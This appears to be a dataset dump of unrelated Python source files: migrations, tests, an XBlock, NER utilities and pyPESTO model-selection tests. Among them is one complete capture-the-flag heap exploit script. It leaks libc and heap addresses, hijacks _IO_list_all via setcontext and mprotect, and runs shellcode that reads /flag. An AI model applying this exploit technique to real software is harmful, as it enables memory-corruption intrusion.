content stringlengths 5 1.05M |
|---|
# Generated by Django 2.0.9 on 2018-12-10 06:11
import django.contrib.postgres.fields.jsonb
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('images', '0017_imageset_zip_state'),
]
operations = [
migrations.AddField(
model_name='image',
name='metadata',
field=django.contrib.postgres.fields.jsonb.JSONField(default=dict),
),
migrations.AddField(
model_name='imageset',
name='metadata',
field=django.contrib.postgres.fields.jsonb.JSONField(default=dict),
),
]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# author: xiaoya li
# file: count_length_autotokenizer.py
import os
import sys
repo_path = "/".join(os.path.realpath(__file__).split("/")[:-2])
print(repo_path)
if repo_path not in sys.path:
sys.path.insert(0, repo_path)
from transformers import AutoTokenizer
from datasets.mrc_ner_dataset import MRCNERDataset
class OntoNotesDataConfig:
def __init__(self):
self.data_dir = "/data/nfsdata2/xiaoya/mrc_ner/zh_onto4"
self.model_path = "/data/xiaoya/pretrain_lm/chinese_L-12_H-768_A-12"
self.do_lower_case = False
self.tokenizer = AutoTokenizer.from_pretrained(self.model_path, use_fast=False, tokenize_chinese_chars=True)
# BertWordPieceTokenizer(os.path.join(self.model_path, "vocab.txt"), lowercase=self.do_lower_case)
self.max_length = 512
self.is_chinese = True
self.threshold = 275
self.data_sign = "zh_onto"
class ChineseMSRADataConfig:
def __init__(self):
self.data_dir = "/data/xiaoya/datasets/mrc_ner/zh_msra"
self.model_path = "/data/xiaoya/pretrain_lm/chinese_L-12_H-768_A-12"
self.do_lower_case = False
self.tokenizer = AutoTokenizer.from_pretrained(self.model_path, use_fast=False, tokenize_chinese_chars=True)
self.max_length = 512
self.is_chinese = True
self.threshold = 275
self.data_sign = "zh_msra"
class EnglishOntoDataConfig:
def __init__(self):
self.data_dir = "/data/xiaoya/datasets/mrc_ner/en_onto5"
self.model_path = "/data/xiaoya/pretrain_lm/cased_L-12_H-768_A-12"
self.do_lower_case = False
self.tokenizer = AutoTokenizer.from_pretrained(self.model_path, use_fast=False)
self.max_length = 512
self.is_chinese = False
self.threshold = 275
self.data_sign = "en_onto"
class EnglishCoNLLDataConfig:
def __init__(self):
self.data_dir = "/data/xiaoya/datasets/mrc_ner/en_conll03"
self.model_path = "/data/xiaoya/pretrain_lm/cased_L-12_H-768_A-12"
if "uncased" in self.model_path:
self.do_lower_case = True
else:
self.do_lower_case = False
self.tokenizer = AutoTokenizer.from_pretrained(self.model_path, use_fast=False, do_lower_case=self.do_lower_case)
self.max_length = 512
self.is_chinese = False
self.threshold = 275
self.data_sign = "en_conll03"
class EnglishCoNLL03DocDataConfig:
def __init__(self):
self.data_dir = "/data/xiaoya/datasets/mrc_ner/en_conll03_doc"
self.model_path = "/data/xiaoya/pretrain_lm/cased_L-12_H-768_A-12"
self.do_lower_case = False
self.tokenizer = AutoTokenizer.from_pretrained(self.model_path, use_fast=False)
self.max_length = 512
self.is_chinese = False
self.threshold = 384
self.data_sign = "en_conll03"
def count_max_length(data_sign):
if data_sign == "zh_onto":
data_config = OntoNotesDataConfig()
elif data_sign == "zh_msra":
data_config = ChineseMSRADataConfig()
elif data_sign == "en_onto":
data_config = EnglishOntoDataConfig()
elif data_sign == "en_conll03":
data_config = EnglishCoNLLDataConfig()
elif data_sign == "en_conll03_doc":
data_config = EnglishCoNLL03DocDataConfig()
else:
raise ValueError
for prefix in ["test", "train", "dev"]:
print("=*"*15)
print(f"INFO -> loading {prefix} data. ")
data_file_path = os.path.join(data_config.data_dir, f"mrc-ner.{prefix}")
dataset = MRCNERDataset(json_path=data_file_path,
tokenizer=data_config.tokenizer,
max_length=data_config.max_length,
is_chinese=data_config.is_chinese,
pad_to_maxlen=False,
data_sign=data_config.data_sign)
max_len = 0
counter = 0
for idx, data_item in enumerate(dataset):
tokens = data_item[0]
num_tokens = tokens.shape[0]
if num_tokens >= max_len:
max_len = num_tokens
if num_tokens > data_config.threshold:
counter += 1
print(f"INFO -> Max LEN for {prefix} set is : {max_len}")
print(f"INFO -> large than {data_config.threshold} is {counter}")
if __name__ == '__main__':
# for english
data_sign = "en_onto"
# data_sign = "zh_onto"
count_max_length(data_sign)
|
import pytest
from pydantic import ValidationError
from kaiba.models.iterator import Iterator
def test_validates(): # noqa: WPS218
"""Test that dict is marshalled to pydantic object."""
test = Iterator(
alias='test',
path=['data'],
)
assert test.alias == 'test'
assert test.path == ['data']
def test_invalid():
"""Test that we get validation error with correct message."""
with pytest.raises(ValidationError) as ve:
Iterator(**{'alias': 'test'})
errors = ve.value.errors()[0] # noqa: WPS441
assert errors['loc'] == ('path',)
assert errors['msg'] == 'field required'
def test_empty_path_is_error():
"""Test that giving an empty path is an error."""
with pytest.raises(ValidationError) as ve:
Iterator(alias='test', path=[])
errors = ve.value.errors()[0] # noqa: WPS441
assert errors['loc'] == ('path',)
assert 'has at least 1 items' in errors['msg']
def test_only_int_and_str_in_path():
"""Test that giving an empty path is an error."""
with pytest.raises(ValidationError) as ve:
Iterator(alias='test', path=[12.2])
errors = ve.value.errors()[0] # noqa: WPS441
assert errors['loc'] == ('path', 0)
assert errors['msg'] == 'str type expected'
|
#!/usr/bin/env python
import sys
import pyautogui
def main():
width, height = pyautogui.size()
pyautogui.moveTo(width / 2, height / 2, 0.5, pyautogui.easeInQuad)
if __name__ == '__main__':
sys.exit(main())
|
from peewee import SQL, CharField, IntegerField
from ...db import db
from ..fields import UIntForeignKeyField
class ProductCategory(db.Model):
name = CharField(column_name="label", null=True)
parent = UIntForeignKeyField(
column_name="parent_id",
field="id",
model="self",
null=True,
on_update="CASCADE",
)
seq = IntegerField(constraints=[SQL("DEFAULT 0")])
class Meta:
table_name = "product_categories"
|
"""update reptiles, field type_inventaire values
Revision ID: e2d0f0d7bc9f
Revises: f4ed33963a7b
Create Date: 2018-03-30 11:49:23.021509
"""
# revision identifiers, used by Alembic.
revision = 'e2d0f0d7bc9f'
down_revision = 'f4ed33963a7b'
from alembic import op
import sqlalchemy as sa
from alembic import context
def upgrade():
schema_upgrades()
if context.get_x_argument(as_dictionary=True).get('data', None):
data_upgrades()
def downgrade():
if context.get_x_argument(as_dictionary=True).get('data', None):
data_downgrades()
schema_downgrades()
def schema_upgrades():
"""schema upgrade migrations go here."""
pass
def schema_downgrades():
"""schema downgrade migrations go here."""
pass
def data_upgrades():
"""Add any optional data upgrade migrations here!"""
query = '''
UPDATE public."ModuleForms"
SET "Options"= '["Crapaudrome/crapauduc","Nasse/piège aquatique","Observation fortuite","Plaque à reptiles","Point d''écoute nocturne","Recherche à vue","Troubleau"]'
WHERE "TypeObj" = 3 AND "Name" = 'type_inventaire';
'''
op.execute(query)
def data_downgrades():
"""Add any optional data downgrade migrations here!"""
pass
|
"""
MIT License
Copyright (c) 2020 Andy Zhou
"""
from flask import Blueprint
user_bp = Blueprint("user", __name__)
from . import views
|
import pandas as pd
import pytest
from pts.dataset import ProcessStartField
@pytest.mark.parametrize(
"freq, expected",
[
("B", "2019-11-01"),
("W", "2019-11-03"),
("M", "2019-11-30"),
("12M", "2019-11-30"),
("A-DEC", "2019-12-31"),
],
)
def test_process_start_field(freq, expected):
process = ProcessStartField.process
given = "2019-11-01 12:34:56"
assert process(given, freq) == pd.Timestamp(expected, freq)
|
import os
import pytest
from robocorp_ls_core.protocols import IConfigProvider
from robocorp_ls_core.robotframework_log import get_logger
from robocorp_ls_core.unittest_tools.cases_fixture import CasesFixture
from robocorp_code.protocols import IRcc
log = get_logger(__name__)
@pytest.fixture
def language_server_client_class():
from robocorp_code_tests.robocode_language_server_client import (
RobocorpLanguageServerClient,
)
return RobocorpLanguageServerClient
@pytest.fixture
def language_server_class():
from robocorp_code.robocorp_language_server import RobocorpLanguageServer
return RobocorpLanguageServer
@pytest.fixture
def main_module():
from robocorp_code import __main__
return __main__
@pytest.fixture
def rcc_location() -> str:
from robocorp_code.rcc import download_rcc
from robocorp_code.rcc import get_default_rcc_location
location = get_default_rcc_location()
download_rcc(location, force=False)
return location
@pytest.fixture
def ci_endpoint() -> str:
ci_endpoint = os.environ.get("CI_ENDPOINT")
if ci_endpoint is None:
raise AssertionError("CI_ENDPOINT env variable must be specified for tests.")
return ci_endpoint
@pytest.fixture
def ci_credentials() -> str:
ci_credentials = os.environ.get("CI_CREDENTIALS")
if ci_credentials is None:
raise AssertionError("ci_credentials env variable must be specified for tests.")
return ci_credentials
@pytest.fixture
def rcc_config_location(tmpdir) -> str:
config_dir = tmpdir.join("config")
os.makedirs(str(config_dir))
return str(config_dir.join("config_test.yaml"))
@pytest.fixture(scope="session")
def cases(tmpdir_factory) -> CasesFixture:
basename = "res áéíóú"
copy_to = str(tmpdir_factory.mktemp(basename))
f = __file__
original_resources_dir = os.path.join(os.path.dirname(f), "_resources")
assert os.path.exists(original_resources_dir)
return CasesFixture(copy_to, original_resources_dir)
@pytest.fixture
def config_provider(
ws_root_path: str, rcc_location: str, ci_endpoint: str, rcc_config_location: str
):
from robocorp_code.robocorp_config import RobocorpConfig
from robotframework_ls.ep_providers import DefaultConfigurationProvider
config = RobocorpConfig()
config.update(
{
"robocorp": {
"rcc": {
"location": rcc_location,
"endpoint": ci_endpoint,
"config_location": rcc_config_location,
}
}
}
)
return DefaultConfigurationProvider(config)
@pytest.fixture
def rcc(config_provider: IConfigProvider, rcc_location: str) -> IRcc:
from robocorp_code.rcc import Rcc
rcc = Rcc(config_provider)
return rcc
@pytest.fixture
def rcc_conda_installed(rcc: IRcc):
result = rcc.check_conda_installed()
assert result.success, r"Error: {result}"
|
"""This XBlock provides syntax highlighting via the PrismJS library"""
import pkg_resources
from web_fragments.fragment import Fragment
from xblock.core import XBlock
from xblock.fields import Scope, String, Integer
from xblockutils.resources import ResourceLoader
class PrismXBlock(XBlock):
"""
Provide syntax highlighting within a code editor
"""
xblock_loader = ResourceLoader(__name__)
display_name = String(
help="The display name for this component",
default="Syntax Highlighter",
scope=Scope.settings
)
code_data = String(
help="Code contents to display within editor",
default="print('hello world')",
scope=Scope.content
)
MAXHEIGHT_HELP = "Maximum height of code block (px)"
maxheight = Integer(
help=MAXHEIGHT_HELP,
default=450,
scope=Scope.settings
)
LANGUAGE_CHOICES = [
{'display_name': 'Bash', 'value': 'bash'},
{'display_name': 'C-like', 'value': 'clike'},
{'display_name': 'CSS', 'value': 'css'},
{'display_name': 'Go', 'value': 'go'},
{'display_name': 'Java', 'value': 'java'},
{'display_name': 'Javascript', 'value': 'javascript'},
{'display_name': 'JSON', 'value': 'json'},
{'display_name': 'Lua', 'value': 'lua'},
{'display_name': 'Markup', 'value': 'markup'},
{'display_name': 'Python', 'value': 'python'},
{'display_name': 'Ruby', 'value': 'ruby'},
{'display_name': 'Shell-Session', 'value': 'shell-session'},
{'display_name': 'SQL', 'value': 'sql'},
{'display_name': 'YAML', 'value': 'yaml'},
]
LANGUAGE_HELP = "Select a programming language"
language = String(
help=LANGUAGE_HELP,
default='python',
values=LANGUAGE_CHOICES,
scope=Scope.settings
)
THEME_CHOICES = [
{'display_name': 'Light', 'value': 'light'},
{'display_name': 'Dark', 'value': 'dark'},
]
THEME_HELP = "Select a syntax highlighting theme"
theme = String(
help= THEME_HELP,
default="dark",
values=THEME_CHOICES,
scope=Scope.settings
)
def resource_string(self, path):
"""Handy helper for getting resources from our kit."""
data = pkg_resources.resource_string(__name__, path)
return data.decode("utf8")
def student_view(self, context=None):
"""
Return a fragment that contains the editor with code for student view.
"""
frag = Fragment()
frag.add_content(self.xblock_loader.render_django_template(
'static/html/lms.html',
context={'self':self}
))
css_path = "static/css/{}.css".format(self.theme)
frag.add_css(self.resource_string(css_path))
frag.add_css(self.resource_string("static/css/prism.css"))
frag.add_javascript(self.resource_string("static/js/src/prism.js"))
frag.initialize_js('RunPrism')
return frag
def studio_view(self, context=None):
"""
Return a fragment that contains the editor with code for studio view.
"""
frag = Fragment()
frag.add_content(self.xblock_loader.render_django_template(
'static/html/studio.html',
context={'self':self}
))
css_path = "static/css/{}.css".format(self.theme)
frag.add_css(self.resource_string("static/codemirror/codemirror.css"))
frag.add_css(self.resource_string(css_path))
frag.add_javascript(self.resource_string("static/js/src/studio.js"))
frag.add_javascript(self.resource_string("static/codemirror/codemirror.js"))
frag.add_javascript(self.resource_string("static/js/src/prism.js"))
frag.initialize_js('PrismXBlock')
return frag
@XBlock.json_handler
def studio_submit(self, data, suffix=''):
"""
Update saved code input with new code input
"""
self.display_name = data.get('display_name')
self.code_data = data.get('code_data')
self.language = data.get('language')
self.theme = data.get('theme')
self.maxheight = data.get('maxheight')
return {'result': 'success'}
# TO-DO: change this to create the scenarios you'd like to see in the
# workbench while developing your XBlock.
@staticmethod
def workbench_scenarios():
"""A canned scenario for display in the workbench."""
return [
("PrismXBlock",
"""<prism/>
"""),
("Multiple PrismXBlock",
"""<vertical_demo>
<prism/>
<prism/>
<prism/>
</vertical_demo>
"""),
]
|
from scipy.stats import expon
from numpy import exp, ceil
from scipy.optimize import root_scalar
class ExponMixture:
def __init__(self, ps, scales):
self.ps = ps
self.scales = scales
self.expons = []
for scale in scales:
self.expons.append(expon(scale=scale))
def pdf(self, x):
result = 0.0
for p, rv in zip(self.ps, self.expons):
result += p*rv.pdf(x)
return result
def cdf(self, x):
result = 0.0
for p, rv in zip(self.ps, self.expons):
result += p*rv.cdf(x)
return result
def sf(self, x):
return 1.0 - self.cdf(x)
def partial_exp(self, x):
result = 0.0
for p, a in zip(self.ps, self.scales):
result -= p*((x+a)*exp(-x/a) - a)
return result
def find_restart_time(self, n=0.0):
b = 1.5 * n
solution = root_scalar(self.__condition, args=(b), x0=10.0 * (b+1.0), x1=b, method='secant', xtol=1.0)
return ceil(solution.root + b)
def __condition(self, t, b):
F = self.cdf(t)
result = (F - 1.0) * t
result += F * (1 - F) / (self.pdf(t))
result -= self.partial_exp(t)
return result - b |
"""Module contains API to operate details route view model."""
from typing import Optional
from pyramid.request import Request
from billtracker.data import repository
from billtracker.data.models.bill import Bill
from billtracker.data.models.users import User
from billtracker.models.base import ViewModel
class BillDetailsViewModel(ViewModel):
"""Represent details view model route."""
def __init__(self, request: Request, user_id: int) -> None:
super().__init__(request)
self.bill_id: int = int(request.matchdict.get("bill_id", -1))
self.bill: Optional[Bill] = repository.bill_by_id(self.bill_id)
self.user_id: int = user_id
self.user: Optional[User] = repository.user_by_id(user_id)
self.amount: Optional[int] = None
self.__validate_ids()
def validate(self) -> None:
"""Validation from form template."""
try:
self.amount = self.__amount
if self.amount < 0 or self.amount > self.bill.total - self.bill.paid: # type: ignore
self.error = "Your amount must be more the zero and less than what you owe."
except ValueError:
self.error = "Amount must be an integer."
@property
def __amount(self) -> int:
"""Returns bill amount."""
return int(self.request.POST.get("amount", -1))
def __validate_ids(self) -> None:
"""Validates model IDs."""
if not self.user:
self.error = f"No user with ID {self.user_id}"
elif not self.bill:
self.error = f"The bill with ID {self.bill_id} was not found"
elif self.user.id != self.bill.user_id:
self.error = "The bill does not belong to user"
self.bill = None
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author: Olivier Noguès
import ares.Lib.AresSql
class AresPostGres(ares.Lib.AresSql.AresSqlConn):
"""
:category: Connector
:rubric: PY
:type: Class
:dsc:
Connector to Access databases. This connector will allow you to create, store and retrieve data from any MS Access Database.
This will return the AReS database object. It will be possible to reuse the same syntaxe to then interact with it.
**The forceCreate function only works for sqlite**, create your database before starting adding the tables and data
## PostGreSql Database
If you want to test your set up locally with a PostGres locally you can install one install locally [Here](https://www.enterprisedb.com/thank-you-downloading-postgresql?anid=1255962)
Once the installation is done you will only have to get the localhost url of your database server
```python
db = aresObj.db(dbFamily="postgresql", database="youpi", host="127.0.0.1", port="5433", username='postgres', password="240985") #database=r"newTestSuper.db")
df = aresObj.file(htmlCode=r"IBRD_Balance_Sheet__FY2010.csv").read()
modelFilePath = df.saveTo(fileFamily="model", dbName='Youpi2')
```
"""
dbFamily = 'postgresql'
_extPackages = [("psycopg2", 'psycopg2')]
|
from configparser import ConfigParser
from emails.EmailSnailPro import EmailSnailPro
from sites.AgentJbzd import AgentJbzd
from utils import BrowserManager
from utils import Logger
if __name__ == '__main__' and __package__ is None:
Logger.setup_logger()
# Read config.ini
config = ConfigParser()
config.read('config.ini')
email_provider_url = config['GENERAL']['EmailProvider']
target_site_url = config['GENERAL']['TargetSite']
driver = BrowserManager.init_driver()
email_agent = EmailSnailPro(driver, email_provider_url)
temp_email = email_agent.get_temp_email()
site_agent = AgentJbzd(driver, target_site_url)
site_agent.register_account(temp_email)
|
#!/usr/bin/python3
from pwncli import *
cli_script()
p:tube = gift['io']
elf:ELF = gift['elf']
libc: ELF = gift['libc']
def add(size:int):
p.sendlineafter("Choice: \n", "1")
p.sendlineafter("Size: ", str(size))
def edit(idx:int, data:(str, bytes)):
p.sendlineafter("Choice: \n", "2")
p.sendlineafter("Index: ", str(idx))
p.sendafter("Content: ", data)
def delete(idx:int):
p.sendlineafter("Choice: \n", "3")
p.sendlineafter("Index: ", str(idx))
def show(idx:int):
p.sendlineafter("Choice: \n", "4")
p.sendlineafter("Index: ", str(idx))
return p.recvline()
add(0x80) # 0
add(0x68) # 1
add(0xf0) # 2
add(0x800) # 3
delete(0)
edit(1, flat(["a" * 0x60, 0x100]))
delete(2)
add(0x80)
msg = show(1)
libc_base_addr = u64(msg[:-1].ljust(8, b"\x00")) - 0x3c4b78
libc.address = libc_base_addr
log_address("libc_base_addr", libc_base_addr)
stop()
delete(0)
add(0xf0)
add(0xf0)
delete(0)
add(0x80)
edit(1, flat([0, libc_base_addr + 0x3c67f8 - 0x10]))
add(0x60)
delete(1)
edit(4, p64(libc.sym["_IO_2_1_stdout_"] - 0x43))
add(0x60)
add(0x68) # 5
edit(5, flat("\x00" * 0x33, 0xfbad1887, 0, 0, 0, libc.sym['__curbrk'] - 8, libc.sym['__curbrk'] + 8))
msg = p.recvn(16)
heap_base_addr = u64(msg[8:]) - 0x21000
log_address("heap_base_addr", heap_base_addr)
stop()
delete(1)
edit(4, p64(libc.sym["_IO_list_all"] - 0x23))
add(0x60)
add(0x60)
edit(6, flat(["\x00" * 0x13, heap_base_addr+0x210]))
delete(3)
add(0x800) # 3
stop()
payload = flat({
0x18:libc.sym['setcontext']+0x35,
0x28:1,
0xd8:heap_base_addr+0x210,
0xa0:heap_base_addr+0x210+0x100,
0xa8:libc.sym['mprotect'],
0x100: heap_base_addr+0x180+0x210,
0x68: heap_base_addr,
0x70: 0x3000,
0x88: 7,
0x180:asm(shellcraft.cat("/flag"))
}, filler="\x00")
edit(3, payload)
stop()
p.sendlineafter("Choice: \n", "5")
p.interactive() |
"""Test cases for dual bytes/str APIs"""
import unittest
"""
The Python 2 str type conveniently permitted the creation of APIs that
could be used as either binary APIs (8-bit str in, 8-bit str out) or as
text APIs (unicode in, unicode out).
The critical enabler for this feature was the ability to define any
*constants* used in these algorithms as 8 bit strings, and then rely on
the implicit promotion to Unicode to handle text input.
In Python 3, that implicit conversion to Unicode is gone, so APIs that
handle both binary and text data need to be written to either have two
separate code paths, or else to automatically decode binary input to text
and then convert it back to binary output again when returning the result.
However, it should be possible to create a Python 3 extension type that
inherits from str (providing interoperability with str objects) and *also*
implements the buffer API (providing interoperability with bytes and
bytearray, and likely other types).
This is a test suite developed on Python 2, demonstrating the convenience
of the implicit conversion in the case of such dual binary/text interfaces.
While the general recommendation for Python 3 code is to ensure APIs are
either binary *or* text rather than a hybrid combination, libraries
migrating from Python 2 that already publish such hybrid APIs may need to
continue to support both styles of usage for the benefit of clients (as
some clients may be using the binary half of the interface, while others
are using the text half).
The URL parsing APIs in Python 3's urllib.parse module are an example of
such an API. It supported both str and unicode in Python 2 and supports
both str and any type with a decode method in Python 3"""
try:
from asciicompat import asciistr
except ImportError:
# Python 2 fallback
asciistr = str
# Developing the tests on Python 2
try:
text_type = unicode
except:
text_type = str
binary_type = bytes
asciistr = str
# Some test values
TEXT = u"text"
BINARY = b"binary"
HYBRID = asciistr("ascii")
class TestHybridAddition(unittest.TestCase):
def test_text_addition(self):
self.assertEqual(TEXT + HYBRID, u"textascii")
self.assertIsInstance(TEXT + HYBRID, text_type)
self.assertEqual(HYBRID + TEXT, u"asciitext")
self.assertIsInstance(HYBRID + TEXT, text_type)
def test_binary_addition(self):
self.assertEqual(BINARY + HYBRID, b"binaryascii")
self.assertIsInstance(BINARY + HYBRID, binary_type)
# Next two are likely to be affected by
# http://bugs.python.org/issue11477
# as the str subclass on the LHS will throw TypeError directly
# as returning NotImplemented from sq_concat is not currently
# supported correctly
self.assertEqual(HYBRID + BINARY, b"asciibinary")
self.assertIsInstance(HYBRID + BINARY, binary_type)
class HybridTestMixin(object):
input_data = None
output_type = None
exists = asciistr("data")
missing = asciistr("not data")
def test_containment(self):
self.assertIn(self.exists, self.input_data)
self.assertIn(self.exists[:2], self.input_data)
self.assertNotIn(self.missing, self.input_data)
def test_partitioning(self):
before, sep, after = self.input_data.partition(self.exists)
self.assertIsInstance(before, self.output_type)
self.assertIsInstance(sep, self.output_type)
self.assertIsInstance(after, self.output_type)
self.assertEqual(sep, self.exists)
def test_casting(self):
self.assertEqual(self.output_type(self.exists), self.exists)
self.assertIs(type(self.output_type(self.exists)), self.output_type)
# Formatting tests: in Python 2, str formatting always produces
# str objects, *except* when a Unicode object is passed to mod-formatting
def test_mod_formatting(self):
formatted = asciistr("%s") % self.input_data
self.assertEqual(formatted, self.input_data)
self.assertIs(type(formatted), self.output_type)
formatted_int = asciistr("%d") % 42
# asciistr also avoids the byte constructor length init quirk
self.assertEqual(formatted_int, asciistr(42))
self.assertIs(type(formatted_int), binary_type)
def test_format_method(self):
formatted = asciistr("{}").format(self.input_data)
self.assertEqual(formatted, self.input_data)
self.assertIs(type(formatted), binary_type)
formatted_int = asciistr("{:d}").format(42)
# asciistr also avoids the byte constructor length init quirk
self.assertEqual(formatted_int, asciistr(42))
self.assertIs(type(formatted_int), binary_type)
class TestBinaryInteraction(unittest.TestCase, HybridTestMixin):
input_data = b"there is binary data in this test case"
output_type = binary_type
class TestTextInteraction(unittest.TestCase, HybridTestMixin):
input_data = u"there is text data in this test case"
output_type = text_type
if __name__ == "__main__":
unittest.main()
|
from functools import partial
from pathlib import Path
from typing import List
import numpy as np
import pandas as pd
import petab_select
import pytest
from more_itertools import one
from petab_select import ESTIMATE, Criterion, Method, Model
import pypesto.select
import pypesto.visualize.select
from pypesto.select import model_problem
# Options sent to `pypesto.optimize.optimize.minimize`, to reduce run time.
minimize_options = {
'n_starts': 10,
}
# Tolerances for the differences between expected and test values.
tolerances = {
'rtol': 1e-2,
'atol': 1e-2,
}
@pytest.fixture
def petab_problem_yaml() -> Path:
"""The location of the PEtab problem YAML file."""
return (
Path(__file__).parent.parent.parent
/ 'doc'
/ 'example'
/ 'model_selection'
/ 'example_modelSelection.yaml'
)
@pytest.fixture
def petab_select_problem_yaml() -> Path:
"""The location of the PEtab Select problem YAML file."""
return (
Path(__file__).parent.parent.parent
/ 'doc'
/ 'example'
/ 'model_selection'
/ 'petab_select_problem.yaml'
)
@pytest.fixture
def petab_select_problem(petab_select_problem_yaml) -> petab_select.Problem:
"""The PEtab Select problem."""
return petab_select.Problem.from_yaml(petab_select_problem_yaml)
@pytest.fixture
def pypesto_select_problem(petab_select_problem) -> pypesto.select.Problem:
"""The pyPESTO model selection problem."""
return pypesto.select.Problem(petab_select_problem=petab_select_problem)
@pytest.fixture
def initial_models(petab_problem_yaml) -> List[Model]:
"""Models that can be used to initialize a search."""
initial_model_1 = Model(
model_id='myModel1',
petab_yaml=petab_problem_yaml,
parameters={
'k1': 0,
'k2': 0,
'k3': 0,
},
criteria={Criterion.AIC: np.inf},
)
initial_model_2 = Model(
model_id='myModel2',
petab_yaml=petab_problem_yaml,
parameters={
'k1': ESTIMATE,
'k2': ESTIMATE,
'k3': 0,
},
criteria={Criterion.AIC: np.inf},
)
initial_models = [initial_model_1, initial_model_2]
return initial_models
def test_problem_select(pypesto_select_problem):
"""Test the `Problem.select` method."""
# Iteration 1 #############################################################
best_model_1, local_history_1, _ = pypesto_select_problem.select(
method=Method.FORWARD,
criterion=Criterion.AIC,
minimize_options=minimize_options,
)
expected_local_history_model_subspace_ids = ['M1_0']
test_local_history_model_subspace_ids = [
model.model_subspace_id for model in local_history_1.values()
]
# The expected "forward" models were found.
assert (
test_local_history_model_subspace_ids
== expected_local_history_model_subspace_ids
)
expected_best_model_aic = 36.97
test_best_model_aic = best_model_1.get_criterion(Criterion.AIC)
# The best model (only model) has its criterion value set and is the
# expected value.
assert np.isclose(
[test_best_model_aic],
[expected_best_model_aic],
**tolerances,
)
# Iteration 2 #############################################################
best_model_2, local_history_2, history_2 = pypesto_select_problem.select(
method=Method.FORWARD,
criterion=Criterion.AIC,
minimize_options=minimize_options,
)
expected_local_history_model_subspace_ids = ['M1_1', 'M1_2', 'M1_3']
test_local_history_model_subspace_ids = [
model.model_subspace_id for model in local_history_2.values()
]
# The expected "forward" models were found.
assert (
test_local_history_model_subspace_ids
== expected_local_history_model_subspace_ids
)
expected_best_model_subspace_id = 'M1_3'
test_best_model_subspace_id = best_model_2.model_subspace_id
# The best model is as expected.
assert test_best_model_subspace_id == expected_best_model_subspace_id
expected_best_model_aic = -4.71
test_best_model_aic = best_model_2.get_criterion(Criterion.AIC)
# The best model has its criterion value set and is the
# expected value.
assert np.isclose(
[test_best_model_aic],
[expected_best_model_aic],
**tolerances,
)
def test_problem_select_to_completion(pypesto_select_problem):
"""Test the `Problem.select_to_completion` method."""
best_models = pypesto_select_problem.select_to_completion(
method=Method.FORWARD,
criterion=Criterion.BIC,
select_first_improvement=True,
startpoint_latest_mle=True,
minimize_options=minimize_options,
)
expected_history_subspace_ids = ['M1_0', 'M1_1', 'M1_4', 'M1_5', 'M1_7']
test_history_subspace_ids = [
model.model_subspace_id
for model in pypesto_select_problem.history.values()
]
# Expected models were calibrated during the search.
assert test_history_subspace_ids == expected_history_subspace_ids
expected_best_model_subspace_ids = ['M1_0', 'M1_1', 'M1_7']
test_best_model_subspace_ids = [
model.model_subspace_id for model in best_models
]
# Expected best models were found.
assert test_best_model_subspace_ids == expected_best_model_subspace_ids
expected_best_model_criterion_values = [36.767, -4.592, -4.889]
test_best_model_criterion_values = [
model.get_criterion(Criterion.BIC) for model in best_models
]
# The best models have the expected criterion values.
assert np.isclose(
test_best_model_criterion_values,
expected_best_model_criterion_values,
**tolerances,
).all()
def test_problem_multistart_select(pypesto_select_problem, initial_models):
"""Test the `Problem.multistart_select` method."""
best_model, best_models = pypesto_select_problem.multistart_select(
method=Method.FORWARD,
criterion=Criterion.AIC,
predecessor_models=initial_models,
minimize_options=minimize_options,
)
expected_best_model_subspace_id = 'M1_3'
test_best_model_subspace_id = best_model.model_subspace_id
# The best model is as expected.
assert test_best_model_subspace_id == expected_best_model_subspace_id
expected_best_models_criterion_values = {
'M1_3': -4.705,
# 'M1_7': -4.056, # skipped -- reproducibility requires many starts
}
test_best_models_criterion_values = {
model.model_subspace_id: model.get_criterion(Criterion.AIC)
for model in best_models
if model.model_subspace_id != 'M1_7' # skipped, see above
}
# The best models are as expected and have the expected criterion values.
pd.testing.assert_series_equal(
pd.Series(test_best_models_criterion_values),
pd.Series(expected_best_models_criterion_values),
**tolerances,
)
initial_model_id_hash_map = {
initial_model.model_id: initial_model.get_hash()
for initial_model in initial_models
}
expected_predecessor_model_hashes = {
'M1_1': initial_model_id_hash_map['myModel1'],
'M1_2': initial_model_id_hash_map['myModel1'],
'M1_3': initial_model_id_hash_map['myModel1'],
'M1_7': initial_model_id_hash_map['myModel2'],
}
test_predecessor_model_hashes = {
model.model_subspace_id: model.predecessor_model_hash
for model in pypesto_select_problem.history.values()
}
# All calibrated models have the expected predecessor model.
assert test_predecessor_model_hashes == expected_predecessor_model_hashes
def test_postprocessors(petab_select_problem):
"""Test model calibration postprocessors."""
output_path = Path('output')
output_path.mkdir(exist_ok=True, parents=True)
postprocessor_1 = partial(
pypesto.select.postprocessors.save_postprocessor,
output_path=output_path,
)
postprocessor_2 = partial(
pypesto.select.postprocessors.waterfall_plot_postprocessor,
output_path=output_path,
)
multi_postprocessor = partial(
pypesto.select.postprocessors.multi_postprocessor,
postprocessors=[postprocessor_1, postprocessor_2],
)
pypesto_select_problem = pypesto.select.Problem(
petab_select_problem=petab_select_problem,
model_postprocessor=multi_postprocessor,
)
# Iteration 1 # Same as first iteration of `test_problem_select` ##########
best_model_1, local_history_1, _ = pypesto_select_problem.select(
method=Method.FORWARD,
criterion=Criterion.AIC,
minimize_options=minimize_options,
)
expected_local_history_model_subspace_ids = ['M1_0']
test_local_history_model_subspace_ids = [
model.model_subspace_id for model in local_history_1.values()
]
# The expected "forward" models were found.
assert (
test_local_history_model_subspace_ids
== expected_local_history_model_subspace_ids
)
expected_best_model_aic = 36.97
test_best_model_aic = best_model_1.get_criterion(Criterion.AIC)
# The best model (only model) has its criterion value set and is the
# expected value.
assert np.isclose(
[test_best_model_aic],
[expected_best_model_aic],
**tolerances,
)
# End Iteration 1 #########################################################
expected_png_file = output_path / (best_model_1.model_hash + ".png")
expected_hdf5_file = output_path / (best_model_1.model_hash + ".hdf5")
# The expected files exist.
assert expected_png_file.is_file()
assert expected_hdf5_file.is_file()
# Remove the expected files (also ensures they firstly exist).
expected_png_file.unlink()
expected_hdf5_file.unlink()
def test_model_problem_fake_result():
"""Test fake results for models with no estimated parameters."""
expected_fval = 100.0
fake_result = model_problem.create_fake_pypesto_result_from_fval(
expected_fval
)
# There is only one start in the result.
fake_start = one(fake_result.optimize_result.list)
expected_id = "fake_result_for_problem_with_no_estimated_parameters"
test_id = fake_start.id
# The fake start has the expected fake ID.
assert test_id == expected_id
expected_x = []
test_x = fake_start.x.tolist()
# The fake start has the expected zero estimated parameters.
assert test_x == expected_x
